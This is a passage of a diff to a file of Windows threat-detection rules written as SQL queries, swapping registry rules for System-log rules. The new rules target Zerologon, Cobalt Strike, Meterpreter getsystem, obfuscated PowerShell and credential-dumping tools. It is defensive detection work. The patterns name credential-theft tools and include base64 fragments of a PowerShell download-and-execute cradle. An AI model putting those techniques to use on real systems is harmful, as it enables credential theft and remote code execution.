'%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - 
"author": "Florian Roth (Nextron Systems)", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE 
'%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name 
of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "status": "experimental", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "status": "experimental", - "description": "Detects 
a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. 
Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + 
"attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND 
ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": 
"win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + 
"attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": 
"registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ 
"attack.execution", - "attack.t1112" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "status": "test", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (Details LIKE '%encrypted%' ESCAPE '\\' OR Details LIKE '%Unlock-Password%' ESCAPE '\\' OR Details LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File 
Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE 